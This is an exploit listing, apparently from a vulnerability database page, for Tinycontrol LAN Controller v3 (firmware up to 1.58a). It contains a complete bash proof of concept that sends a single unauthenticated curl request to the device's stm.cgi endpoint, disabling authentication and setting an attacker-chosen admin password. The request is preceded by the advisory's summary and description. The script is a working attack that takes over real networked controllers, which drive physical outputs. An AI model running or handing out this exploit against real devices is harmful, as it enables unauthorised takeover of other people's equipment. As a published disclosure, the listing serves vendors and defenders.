Tinycontrol LAN Controller 3 Remote Admin Password Change

2023.09.05
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/bin/bash : " Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change Vendor: Tinycontrol Product web page: https://www.tinycontrol.pl Affected version: <=1.58a, HW 3.8 Summary: Lan Controller is a very universal device that allows you to connect many different sensors and remotely view their readings and remotely control various types of outputs. It is also possible to combine both functions into an automatic if -> this with a calendar when -> then. The device provides a user interface in the form of a web page. The website presents readings of various types of sensors: temperature, humidity, pressure, voltage, current. It also allows you to configure the device, incl. event setting and controlling up to 10 outputs. Thanks to the support of many protocols, it is possible to operate from smartphones, collect and observ the results on the server, as well as cooperation with other I/O systems based on TCP/IP and Modbus. Desc: The application suffers from an insecure access control allowing an unauthenticated attacker to change accounts passwords and bypass authentication gaining panel control access. Tested on: lwIP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5787 Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php 18.08.2023 " set -euo pipefail IFS=$'\n\t' if [ $# -ne 2 ]; then echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n' exit fi IP=$1 PW=$2 EN=$(echo -n $PW | base64) curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg== # ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/ echo -ne '\nAdmin password changed to: '$PW


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top